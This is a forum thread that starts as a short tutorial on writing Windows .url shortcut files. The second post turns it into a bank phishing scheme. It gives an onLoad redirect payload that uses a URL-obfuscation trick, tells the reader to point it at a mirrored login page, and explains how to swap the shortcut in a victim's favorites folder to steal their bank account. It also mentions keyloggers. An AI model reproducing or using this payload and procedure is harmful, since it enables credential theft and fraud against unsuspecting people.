Manually creating .url files {tutorial, sort off}
Results 1 to 3 of 3

Thread: Manually creating .url files {tutorial, sort off}

  1. #1
    Senior Member
    Join Date
    Jun 2003
    Posts
    772

    Manually creating .url files {tutorial, sort off}

    I had written this and put it on my website a while ago, thought I'd post it here.
    I didn't post it in the tutorials forum because I don't think you can really consider it as a tutorial. If a mod does believe this is a tutorial please move it there...

    This is easy and you can easily find it out by yourself, but
    lame people have to exist too so I wrote this

    1. What is a .url file
    ------------------------

    A URL file is like a shortcut, it opens your default
    browser and displays the URL from within the URL file.

    2. Create the damn thing
    -------------------------------

    Open up your favourite text editor (notepad, wordpad, word, edit,...)
    The syntax is like:

    [InternetShortcut]
    URL=http://www.google.com
    IconFile=C:\windows\system\url.dll
    IconIndex=1


    The value of URL is of course the URL you want it to point to.
    IconFile is the icon you want to use.
    IconIndex is only useful when you use an icon from a .dll file, if you want
    to use the 2nd Icon from that dll file its value should be 2.

    This is actually not very useful...Yet I wrote it...whatever
    The above sentences are produced by the propaganda and indoctrination of people manipulating my mind since 1987, hence, I cannot be held responsible for this post\'s content - me

    www.elhalf.com

  2. #2
    Member
    Join Date
    May 2002
    Posts
    68
    This is actually not very useful...Yet I wrote it...whatever
    That's where your wrong. Sometimes the littlest trick, can be the icing on a very big one.
    Try using it in conjuction with something else.

    Create an html file(c:\exploit.html) on a targets computer and insert this browser hack. Works on IE and some ver. of mozilla.
    <BODY onLoad="location.href=unescape('http://www.microsoft.com%01@redhat.com');">
    Insert FirstBank login for the first url and then mywebsite.com/hack (containing mirrored html content from the login screen) for the second one.

    Next create the cute little url
    [InternetShortcut]
    URL=c:\exploit.html
    IconIndex=1

    replace the shortcut to the real url in the victims favorite folder and bingo you have somebody's bank account, or whatever. Of course it might be easier to use a keyboard logger in most cases, but it could be useful in certain situations.
    [gloworange]
    find /home/$newbie -name *? | www.google.com 2>/dev/null
    [/gloworange]

  3. #3
    Senior Member
    Join Date
    Jun 2003
    Posts
    772
    Yeah, I know it might be useful for cross site scripting and stuff, if you look at the original on my website, I mentioned that (www.elhalf.tk)...but still, most of the time you won't need it...

    EDIT: seems lots of old members are returning...
    The above sentences are produced by the propaganda and indoctrination of people manipulating my mind since 1987, hence, I cannot be held responsible for this post\'s content - me

    www.elhalf.com

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •